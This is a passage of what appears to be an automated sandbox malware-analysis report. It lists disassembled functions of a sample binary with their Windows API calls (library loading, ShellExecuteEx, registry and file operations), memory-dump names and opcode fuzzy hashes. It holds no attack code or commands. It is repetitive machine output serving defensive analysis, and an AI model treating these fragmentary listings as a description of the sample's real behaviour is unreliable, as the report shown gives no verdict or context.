                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                          • String ID:
                                          • API String ID: 272304278-0
                                          • Opcode ID: f2e48a5e8a203443d3c33271ce0f9735b5c93dfd994dafb16a654df9d47eecf3
                                          • Instruction ID: 6b1abf6515557d62da2d50c6614d7234559e2bc744a6dd33fd0f560afca48da2
                                          • Opcode Fuzzy Hash: f2e48a5e8a203443d3c33271ce0f9735b5c93dfd994dafb16a654df9d47eecf3
                                          • Instruction Fuzzy Hash: EC018B31405216EFDB105FA5EC08BEE7BB6FB04751F210161F925B21A1CB311E49EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32 ref: 00EA187F
                                          • UnloadUserProfile.USERENV(?,?), ref: 00EA188B
                                          • CloseHandle.KERNEL32(?), ref: 00EA1894
                                          • CloseHandle.KERNEL32(?), ref: 00EA189C
                                          • GetProcessHeap.KERNEL32 ref: 00EA18A5
                                          • HeapFree.KERNEL32(00000000), ref: 00EA18AC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: 715406c03e5c085824a071c9258aaedfa3a43c1dddc250e49885c144f7f14695
                                          • Instruction ID: d614da822dc974fa651dc61df538268893f676eacd53a44d8fa61df08f34cb84
                                          • Opcode Fuzzy Hash: 715406c03e5c085824a071c9258aaedfa3a43c1dddc250e49885c144f7f14695
                                          • Instruction Fuzzy Hash: 4BE0ED36046112FFDB016FA2FD0C905BF39FF497627208222F225A10B1CB325464DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • GetMenuItemInfoW.USER32 ref: 00EAC6EE
                                          • _wcslen.LIBCMT ref: 00EAC735
                                          • SetMenuItemInfoW.USER32 ref: 00EAC79C
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EAC7CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info_wcslen$Default
                                          • String ID: 0
                                          • API String ID: 1227352736-4108050209
                                          • Opcode ID: 605847fbf6f0bbd9b3591af18473fc3ff2abecb18655f213a9d8b8fb0ede521b
                                          • Instruction ID: cbc50b5b6453b23a3a1e6e7a0336678204d605d018395e37335225295087895a
                                          • Opcode Fuzzy Hash: 605847fbf6f0bbd9b3591af18473fc3ff2abecb18655f213a9d8b8fb0ede521b
                                          • Instruction Fuzzy Hash: 2351F1716043019BD715DF38C845BAB77E4AF8E318F242A2AF991FB190DB60E844CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00ECAEA3
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                          • GetProcessId.KERNEL32(00000000), ref: 00ECAF38
                                          • CloseHandle.KERNEL32(00000000), ref: 00ECAF67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                          • String ID: <$@
                                          • API String ID: 146682121-1426351568
                                          • Opcode ID: 718ab0be92067c34ef975ceafcb9c407074784871bf4bf28c79ce06a66bba878
                                          • Instruction ID: be7966c8a278d4893d5704f8a0107b02a26ef6b9975dee78fced07550e577778
                                          • Opcode Fuzzy Hash: 718ab0be92067c34ef975ceafcb9c407074784871bf4bf28c79ce06a66bba878
                                          • Instruction Fuzzy Hash: 7F715470A002199FCB14DF54D584A9EBBF1EF08318F0894ADE856BB352CB35ED46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32 ref: 00EA7206
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EA723C
                                          • GetProcAddress.KERNEL32 ref: 00EA724D
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EA72CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: 4f028085f7fdb0b7a35351b5efafca64da0cf17e9a8bda4de1e5ac6f21c51942
                                          • Instruction ID: 977ad8cc838fc0e221e033bbc923bb2a4ae59e945a5346e7ca7e94f7752afa8f
                                          • Opcode Fuzzy Hash: 4f028085f7fdb0b7a35351b5efafca64da0cf17e9a8bda4de1e5ac6f21c51942
                                          • Instruction Fuzzy Hash: D5418EB1604204AFDB15CF54CC84B9A7BB9EF49314F2490AABD45EF21AD7B0E945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00ED2F8D
                                          • LoadLibraryW.KERNEL32(?), ref: 00ED2F94
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00ED2FA9
                                          • DestroyWindow.USER32 ref: 00ED2FB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                          • String ID: SysAnimate32
                                          • API String ID: 3529120543-1011021900
                                          • Opcode ID: 9349e014e0ce185d58f7e3685ac2ab1c88fca2f51a8ecaf3a2c6cf7fda0ecd43
                                          • Instruction ID: b71acb02d47604ac5bd48fb0be1ee07bfae6c61e0688dfc2a78c68a40d7f74ba
                                          • Opcode Fuzzy Hash: 9349e014e0ce185d58f7e3685ac2ab1c88fca2f51a8ecaf3a2c6cf7fda0ecd43
                                          • Instruction Fuzzy Hash: 2C219F71204205AFEB104F64DC80EBB37B9EB69368F106A1EFA50F2290D772DC52A760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E64D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 961263a0705ac434497514321bf30bba9a01d767c6c041685291de66b7b8a5d8
                                          • Instruction ID: c7322128ec536831a87c3b8e78fd65c9853a6815767fe1da06cd6706fb20e3f2
                                          • Opcode Fuzzy Hash: 961263a0705ac434497514321bf30bba9a01d767c6c041685291de66b7b8a5d8
                                          • Instruction Fuzzy Hash: A7F0AF74A41219BFDB109F91EC09BAEBBB8EF44795F1001A5F805B22A0CF705984DA91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E44E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E9C
                                          • GetProcAddress.KERNEL32 ref: 00E44EAE
                                          • FreeLibrary.KERNEL32 ref: 00E44EC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-3689287502
                                          • Opcode ID: 0d49e1595c5238e619a4dec6f29f2cc96fdf1d5d982c0dea5d696a144cfc7cf5
                                          • Instruction ID: a5b8a858ae6d76e5c5b7353a520cca2b82410db50d34fdd949574660c2285df4
                                          • Opcode Fuzzy Hash: 0d49e1595c5238e619a4dec6f29f2cc96fdf1d5d982c0dea5d696a144cfc7cf5
                                          • Instruction Fuzzy Hash: BFE08635B036339FD22117267C1CB6F6668EF81BA67151117FC00F6290DF60CD06C0A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E44E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00E44E62
                                          • GetProcAddress.KERNEL32 ref: 00E44E74
                                          • FreeLibrary.KERNEL32 ref: 00E44E87
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-1355242751
                                          • Opcode ID: 685e76d49d0c0599f32aa529235d4e99c93b12f77d4b7a7161479d0591f630fd
                                          • Instruction ID: cf264d2b584d901d701e47c044a955c78ba24434dc9bca83246cba6c233affbc
                                          • Opcode Fuzzy Hash: 685e76d49d0c0599f32aa529235d4e99c93b12f77d4b7a7161479d0591f630fd
                                          • Instruction Fuzzy Hash: BED0C231A036335B8B221B267C08E8F6B2CEF81B953151613B800F7194CF20CD02C1D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00ECA427
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ECA435
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ECA468
                                          • CloseHandle.KERNEL32(?), ref: 00ECA63D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                          • String ID:
                                          • API String ID: 3488606520-0
                                          • Opcode ID: 74dccc195e38275952283b3ab0844b3a31a4f490e99d76ddc150d3e02205b561
                                          • Instruction ID: e81242b043f1189b3a933e80154d22d4634f8b5ed72fe5fa2b9d69a330efe4b1
                                          • Opcode Fuzzy Hash: 74dccc195e38275952283b3ab0844b3a31a4f490e99d76ddc150d3e02205b561
                                          • Instruction Fuzzy Hash: 8DA1C1716043009FD720DF24D986F2AB7E1AF84718F18985DF95AAB392D771EC05CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADDFD
                                            • Part of subcall function 00EADDE0: GetFullPathNameW.KERNEL32 ref: 00EADE16
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • lstrcmpiW.KERNEL32 ref: 00EAE473
                                          • MoveFileW.KERNEL32 ref: 00EAE4AC
                                          • _wcslen.LIBCMT ref: 00EAE5EB
                                          • _wcslen.LIBCMT ref: 00EAE603
                                          • SHFileOperationW.SHELL32 ref: 00EAE650
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                          • String ID:
                                          • API String ID: 3183298772-0
                                          • Opcode ID: 4fffc37df1ad8ea38d65ad114a0e2a98afd416b9b4214b492b98ae7630fc1d26
                                          • Instruction ID: c9b7f0c46393860761603c79110719b1bb92513c94719fdaa37aa6efa8532d7b
                                          • Opcode Fuzzy Hash: 4fffc37df1ad8ea38d65ad114a0e2a98afd416b9b4214b492b98ae7630fc1d26
                                          • Instruction Fuzzy Hash: C25193B24083459BC724DB94EC819DBB3ECAF99344F10191EF589E7192EF34B5888766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ECB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                            • Part of subcall function 00ECC998: CharUpperBuffW.USER32(?,?), ref: 00ECC9B5
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECC9F1
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA68
                                            • Part of subcall function 00ECC998: _wcslen.LIBCMT ref: 00ECCA9E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECBAA5
                                          • RegOpenKeyExW.ADVAPI32 ref: 00ECBB00
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ECBB63
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECBBA6
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECBBB3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                          • String ID:
                                          • API String ID: 826366716-0
                                          • Opcode ID: ed70b07f19392b05eaaf879fc978ddf3c07f8d656895a689dab2052be7e3e45d
                                          • Instruction ID: f7a88e900281ebca27ea71c7c6157301807f4f352db61dad3aea93e297cadce8
                                          • Opcode Fuzzy Hash: ed70b07f19392b05eaaf879fc978ddf3c07f8d656895a689dab2052be7e3e45d
                                          • Instruction Fuzzy Hash: D461B131208241AFC314DF14C591F2ABBE5FF84308F14955DF499AB2A2CB32ED46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00EA8BCD
                                          • VariantClear.OLEAUT32 ref: 00EA8C3E
                                          • VariantClear.OLEAUT32 ref: 00EA8C9D
                                          • VariantClear.OLEAUT32 ref: 00EA8D10
                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EA8D3B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$Clear$ChangeInitType
                                          • String ID:
                                          • API String ID: 4136290138-0
                                          • Opcode ID: b5d9c4d64393562bfe1e18aeb4b37633a2d4b5d9a6cd036990f6e7be2eaad840
                                          • Instruction ID: 13939e7ca9ba1c99436b7c5c30617b2c4f2268f0300e26e00f23936bae498ed8
                                          • Opcode Fuzzy Hash: b5d9c4d64393562bfe1e18aeb4b37633a2d4b5d9a6cd036990f6e7be2eaad840
                                          • Instruction Fuzzy Hash: 0A5169B5A0021AEFCB14CF68D894AAAB7F8FF8D314B158559E915EB350E730E911CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 00EB8BAE
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 00EB8BDA
                                          • WritePrivateProfileSectionW.KERNEL32 ref: 00EB8C32
                                          • WritePrivateProfileStringW.KERNEL32 ref: 00EB8C57
                                          • WritePrivateProfileStringW.KERNEL32 ref: 00EB8C5F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String
                                          • String ID:
                                          • API String ID: 2832842796-0
                                          • Opcode ID: 5536b9783a002d260d3779ff3c061ec333c1d7d182be9fbdbb817b5b7d4884b5
                                          • Instruction ID: 9b077bf75f593496199fbb27c5c5b8fe5cc4b25e052cb51899ce243178fe6e66
                                          • Opcode Fuzzy Hash: 5536b9783a002d260d3779ff3c061ec333c1d7d182be9fbdbb817b5b7d4884b5
                                          • Instruction Fuzzy Hash: F0516835A00215AFCB00DF64D881AAEBBF5FF48314F089459E849AB362CB35ED41CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EC8F40
                                          • GetProcAddress.KERNEL32 ref: 00EC8FD0
                                          • GetProcAddress.KERNEL32 ref: 00EC8FEC
                                          • GetProcAddress.KERNEL32 ref: 00EC9032
                                          • FreeLibrary.KERNEL32 ref: 00EC9052
                                            • Part of subcall function 00E5F6C9: WideCharToMultiByte.KERNEL32 ref: 00E5F6E6
                                            • Part of subcall function 00E5F6C9: WideCharToMultiByte.KERNEL32 ref: 00E5F70D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                          • String ID:
                                          • API String ID: 666041331-0
                                          • Opcode ID: a9437bddb9d00975fa404fa061da138d040e1843e1dc5349fd015219b69662b7
                                          • Instruction ID: aa355bd4e8cb84cb994bc38e46ae54be88ef8ad67cdfa28c280b8574e26525e6
                                          • Opcode Fuzzy Hash: a9437bddb9d00975fa404fa061da138d040e1843e1dc5349fd015219b69662b7
                                          • Instruction Fuzzy Hash: 3C514934601245DFC715DF58C685DADBBF1FF49314B0490A9E80AAB362DB32ED86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32 ref: 00ED6C33
                                          • SetWindowLongW.USER32 ref: 00ED6C4A
                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00ED6C73
                                          • ShowWindow.USER32(00000002,00000000), ref: 00ED6C98
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00ED6CC7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
